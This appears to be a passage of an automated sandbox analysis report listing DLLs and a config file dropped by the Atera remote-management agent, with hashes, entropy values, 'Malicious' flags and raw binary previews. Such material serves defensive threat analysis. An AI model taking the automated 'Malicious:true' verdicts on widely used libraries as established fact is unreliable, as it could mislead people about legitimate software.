                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):93232
                                                                                                                                                                                                                                        Entropy (8bit):6.195903304850222
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:zSvbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hx9:zS8UMW+BV5M+5Nn0kom/RS3
                                                                                                                                                                                                                                        MD5:B969BFF44179BF8A3584EEB9E026CAE1
                                                                                                                                                                                                                                        SHA1:DBA7A528F51870B89AED549E81EF0660F43B2943
                                                                                                                                                                                                                                        SHA-256:5EE05D3796AB12ECF7F2D32D48D41D2A2A3FD257AD8456A0EBD5E6019492ECF1
                                                                                                                                                                                                                                        SHA-512:F0643905258D2C09CA0A6C30A0A9AD5AD2FE184A65B7FFA5B7B731FEE8357672B35246626A10B39DF7C18EF1B75328192495685DDF9CD2F524E913D6A2993E18
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.........." ..0..:..........^X... ...`....... ....................................`..................................X..O....`..8............D..0(...........V............................................... ............... ..H............text...d8... ...:.................. ..`.rsrc...8....`.......<..............@..@.reloc...............B..............@..B................@X......H.......|f..X............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tM...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95280
                                                                                                                                                                                                                                        Entropy (8bit):5.998418289121845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6iLY8I1pq2jBTn9kbf0KNGVIYMcoS1JkEX5g7HxlF:/Z0PMcjrgF
                                                                                                                                                                                                                                        MD5:3AB0B86F5D058374AC789F05FB6C6E81
                                                                                                                                                                                                                                        SHA1:4C8142A6EA10F48735429B125ADC278178FA0082
                                                                                                                                                                                                                                        SHA-256:5F773968BD0501D91C4AE1339D248B4F766C39885B35088953AFB1BE6FBCC4E8
                                                                                                                                                                                                                                        SHA-512:1A6CC62361FDD20A99D9551E677269D9D67B6F4B66C09083E07AE5732C23FFE15A5E687437A16A27896A19DECEB9F23D7614B6CC44445C365E3A59DED1AEE6E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..B..........R`... ........... ..............................P.....`.................................._..O....................L..0(..........(_..8............................................ ............... ..H............text...X@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B................3`......H........h................................................................(......}......}.......}.......}........o=...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po!...o....*..{....o0...r...p.(....(....o&...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.6559468525212
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:wXh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl55qz:wXh+tYmNyb8E9VF6IYinAM+oCaF5qz
                                                                                                                                                                                                                                        MD5:8E2D0F47E477FAE8132492A31B26F1B3
                                                                                                                                                                                                                                        SHA1:6C3EB7CB1D5E942DC6A62767A701D201E2F69CE1
                                                                                                                                                                                                                                        SHA-256:7C8CD3B61286AAC09534541EDBFF10618938236830167581BD3E922CA55A1456
                                                                                                                                                                                                                                        SHA-512:B40EA70361F5AFCCB3DC41D38A4F302AEE00B9AAC206AD2DFBD1591A7722AF732BC820C3C66EA3BC0816D4C98E364D1345077EDC786ED19135659AC91E0CFC06
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............." ..0.............v,... ...@....... ....................................@.................................",..O....@..(...............0(...`......H+..8............................................ ............... ..H............text...|.... ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................V,......H........ ..d...........................................................&...(....*6.r...p.(....*..(....*..(....*"..(....*. ....*.r-..p*..(....*"..(....*. ....*.r...p*..(....*"..(....*. .*..*.r...p*. ....*.rN..p*..(....*.BSJB............v2.0.50727......l.......#~......<...#Strings....D...$...#US.h.......#GUID...x.......#Blob...........G..........3......................................................................f.....F...........n.................M...........2...........Z.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.ModelsV3.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):75312
                                                                                                                                                                                                                                        Entropy (8bit):6.23943595769723
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Tu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYH:KF+qo7mDEwj4NXLGcfgruFcg7HxRt
                                                                                                                                                                                                                                        MD5:D5B69F2C4F5CB0E7D43D7F6C1C87DC7E
                                                                                                                                                                                                                                        SHA1:98FDA78C049D650E47C17D9072E82D87C1B59E9F
                                                                                                                                                                                                                                        SHA-256:6C1325D183C7CC3E516628921005F18BB5A191B0029AF93DFB022CA4C2ABBAE9
                                                                                                                                                                                                                                        SHA-512:D95C5CD5E9DAC57FA9C5DE8645F637363A5E787A8C521B09BFBEA56D01765F4FC31E4080BDCAD28BBD90FDB9BEE1CAB50E95FF13CFAC728405D87C3EFE3A387B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6............" ..0.............F.... ... ....... .......................`.......w....`.....................................O.... ..................0(...@..........T............................................ ............... ..H............text...L.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................%.......H.......t<..`.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*...0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):52272
                                                                                                                                                                                                                                        Entropy (8bit):6.4113040933608225
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:TQMnML8f1VNPa7fb8LRaIzlRK/usybUjuUY0vZKE8tcqPqZw+I39Wu1FEpYinAMU:T9ML8LW/usybGYVE8mZw+89Wu1e7Hxav
                                                                                                                                                                                                                                        MD5:94B12931B9032E80157DC27422393FEC
                                                                                                                                                                                                                                        SHA1:2B762FCA27538B55ACF736F7D65E293E5F15EAEA
                                                                                                                                                                                                                                        SHA-256:746AD9902D9310CC2F172736AC156018ECD3843BA58C8337DE017074B06CD645
                                                                                                                                                                                                                                        SHA-512:D943A39FDD74627514818DAF3434BD1ABEB4EE10077E8B10414098DDA2972851795A15CBD4CAD73A67D5171446E4A6D844CDF8BD705E72F34B7DA16678097BE9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&............." ..0.................. ........... ...................................`.................................>...O.......4...............0(..........t...T............................................ ............... ..H............text........ ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................r.......H........E...s...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....P.........io ...&..i.X.P..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....P......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398896
                                                                                                                                                                                                                                        Entropy (8bit):6.1343664856235245
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:5jS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvM:5+e55LgIkTmyAAfTnMLvM
                                                                                                                                                                                                                                        MD5:FACA1B5218F8EB76963366A6842E122D
                                                                                                                                                                                                                                        SHA1:41B281ABA7D7FE994EE6C77F7F71042885919EC0
                                                                                                                                                                                                                                        SHA-256:D779F3514666734455B5B2B7AEB035F7E1D7394CD445E332DD4D236E24D5C94E
                                                                                                                                                                                                                                        SHA-512:8F350CB3D0C13A701C67749E103B1E07EE1E2EF8EFE71B70CC728F8E21DC02922BAB241CA256695DAC9B225D450623E9F8DA055EA062E336D7F1CD9D2A3FB6D9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`............`.................................v...O.... ..................0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1409
                                                                                                                                                                                                                                        Entropy (8bit):4.992215339808616
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dNQjY8L2PRRkMYaWcvJ9AwcPGnJg8vQpyriEWZoEs4h:cb8MRRkMVB9AwVbIQdsoEf
                                                                                                                                                                                                                                        MD5:766E089F9AF0DAD5BFD8B77167D1E0FD
                                                                                                                                                                                                                                        SHA1:0AD55E6BA596EFEB24867DC9FDCE4B3D2F2D904F
                                                                                                                                                                                                                                        SHA-256:1D95ED644BB7D706E5B8EBDCB875B23F8B21C62C53C701EB8B3385F770808D7E
                                                                                                                                                                                                                                        SHA-512:FD8ECF32094577A51579911AC3722D839A7B0874146B909EB8DC944CDB5DA459BFCF7EB64B47EC08F40515E6C38B4C4CBA1F4D9F9EB403E891A8710310DBAECA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<nlog xmlns="http://www.nlog-project.org/schemas/NLog.xsd".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xsi:schemaLocation="http://www.nlog-project.org/schemas/NLog.xsd NLog.xsd".. autoReload="true".. throwExceptions="false".. internalLogLevel="Off" internalLogFile="c:\temp\nlog-internal.log">.... optional, add some variables.. https://github.com/nlog/NLog/wiki/Configuration-file#variables.. -->.. <variable name="myvar" value="myvalue"/>.... .. See https://github.com/nlog/nlog/wiki/Configuration-file.. for information on customizing logging rules and outputs... -->.. <targets>.... .. add your targets here.. See https://github.com/nlog/NLog/wiki/Targets for possible targets... See https://github.com/nlog/NLog/wiki/Layout-Renderers for the possible layout renderers... -->.... .. Write events to a file with the date in the filename... <target xsi:type="File" na

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):883760
                                                                                                                                                                                                                                        Entropy (8bit):6.071504659955744
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:V1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQJ:V1n1p9LdRN39aQZUqM
                                                                                                                                                                                                                                        MD5:17A183A03C34B8EC1C91B3DD0B50E022
                                                                                                                                                                                                                                        SHA1:7D226520BE51BD71D05D7EB56793233794F87DA4
                                                                                                                                                                                                                                        SHA-256:381278035C5A8A4668D31B12F0BF3DEC6544E9668FED84DA038A8D21D233D72D
                                                                                                                                                                                                                                        SHA-512:AD5591F6B90A07C00F10EF19231BB3C766E9E27C2205AB3A32C15B7D0DE0F732A5600665E4302290C771F06370B23E4FF0AC63E51C1F36899F98CCB6BD5F8C01
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ...............................;....`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960370699367048
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:hBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUW:hBA/ZTvQD0XY0AJBSjRlXP36RMGj
                                                                                                                                                                                                                                        MD5:53D8AD0BCDED36C2EEBD4D3C45A60BD7
                                                                                                                                                                                                                                        SHA1:9289840CB0518AF183BB41AB05428A6415B92AAE
                                                                                                                                                                                                                                        SHA-256:07A068EF96EE5F447282B42B1818FDFC372B674893E6742A5F83DDBC4DF13ACD
                                                                                                                                                                                                                                        SHA-512:41B19112B6CCE405E16153354223F4AFF548E9F55EDFDC158588E78D9EAA755E10865D7220B916EC14DAB4181C55C005B161B44AC011419EE85EFF5F65975523
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284208
                                                                                                                                                                                                                                        Entropy (8bit):6.11766612253341
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:IZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHex:Ogo0WPVTXgk
                                                                                                                                                                                                                                        MD5:D1BA01295CAEFA1F00261AAA943FFDBC
                                                                                                                                                                                                                                        SHA1:54BE9D6F121721542E1B563804766592C9EBF14E
                                                                                                                                                                                                                                        SHA-256:F425945B4D1BD5D65776EE4FF4330F33947692EA5E797EDA3103B6E380196BAF
                                                                                                                                                                                                                                        SHA-512:DFFE1F15F635FD9C083B51C66DBE5C5C9B16516B8CA036B262765279FBF01FC521D10AE31288CA3FB5DAD4F8B6E744DDA33FB8698267C40970DCA9409178E067
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ....................................`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.678784612747097
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqpx:tuhMaVmzDC67EpYinAMxCJ
                                                                                                                                                                                                                                        MD5:35082EAB5825C9A9D021B5B97BE382B2
                                                                                                                                                                                                                                        SHA1:4716CBD843C8A2A1AA7ED7C95700672E9A863674
                                                                                                                                                                                                                                        SHA-256:B91E3FA4C89230B668EE2DE7D6824DAB708B981F1AE94E734445154BC8A3F6EC
                                                                                                                                                                                                                                        SHA-512:9F0FFB52E060910662AE7AA020AE836119BC609B3E0E9367C7C9D2F2975FC1DDEB1EC1B2F708704C22D666E778B787679BEE5A3CAB5868C09CCB5B57C9026BA2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):97328
                                                                                                                                                                                                                                        Entropy (8bit):6.2419469146373485
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:3NSbHB6zBedWp71O37rGMsQ5gbDnTE8iayI2Sf+Ku6JhbDEhr4WTJ7HxQ:3N3OWMsQ56vd2s+KuYc9RTJa
                                                                                                                                                                                                                                        MD5:9F59EFE4EE7BFF13F5866311048A6A80
                                                                                                                                                                                                                                        SHA1:1F20929EE2BCC0BE40848CC739C6F31CAD13DA69
                                                                                                                                                                                                                                        SHA-256:32FB947BAD722480938922DC363DB76AB0079383C6D732B4998C302B03D87200
                                                                                                                                                                                                                                        SHA-512:CCCAAF2396AD1307AF0B51B424005BFB350508059CD9CF3E9641D396CCA3EC4C22EFB0329DF0AFD0B3888E07559B6904A0361B85A80A527CD3139161CFF91DAA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0............" ..0..J...........h... ........... ..............................P.....`..................................g..O....................T..0(...........f..T............................................ ............... ..H............text...4I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................h......H.......L...............<^.. ...\f........................................{'...*:.((.....}'...*..0..#........u......,.()....{'....{'...o*...*.*v ..yN )UU.Z()....{'...o+...X*....0..:........r...p......%..{'......%q.........-.&.+.......o,....(-...*..{....*:.((.....}....*....0..#........u......,.()....{.....{....o*...*.*v ..:. )UU.Z()....{....o+...X*....0..:........r-..p......%..{.......%q.........-.&.+.......o,....(-...*..{/...*..{0...*V.((.....}/.....}0...*.0..;........u......

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138288
                                                                                                                                                                                                                                        Entropy (8bit):6.17954530016547
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:G3XFz0qjCIPMAxlUXUKoPfw0kG71AHK7cnO:U0qjCSRE+fw0kG719
                                                                                                                                                                                                                                        MD5:6D055BBD0463057997B216FA41FC1BAA
                                                                                                                                                                                                                                        SHA1:0E3B5685453BFE674252EEFE7B29DDFFE3394F36
                                                                                                                                                                                                                                        SHA-256:94571C1156471E113A0BA58686D0E0F8C8A18B7F5415A17CC00688D6901D6DD6
                                                                                                                                                                                                                                        SHA-512:D3D1FB3588D4AE7279244086069DEF2145FDD341099BD66B801CE1F7EB18F4F68B0043D3CF4BA5C8FA3FA680EF228C3371743AF1E9DCAA64711321EC6A94FCEC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6wb.........." ..0.................. ... ....... .......................`......\.....@.................................?...O.... ..@...............0(...@..........8............................................ ............... ..H............text...h.... ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B................s.......H........ ..............\.......D.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.673983708245621
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Oh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBhKr+:Oy9eEpYinAMxCAcr+
                                                                                                                                                                                                                                        MD5:351EE6E0FBE6951D43F195DBFD34911A
                                                                                                                                                                                                                                        SHA1:2FAAD5BD1D08D9791C941F6F01BA41473C12DD1F
                                                                                                                                                                                                                                        SHA-256:8B4AF4380F5083A9DC11F5E74FEA942A34DE4AA3740EE0DBCEF92A95AFD656F6
                                                                                                                                                                                                                                        SHA-512:00A0600E0E4541058B8FF5A7314E0C2779B5BA5E3F9FBE9F15556E84D84D8B3C0317116B29A832CB038457EF6CE1FA88149C18E7DD33D27A3ADD3AFFAC5FF9D7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ....................................@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

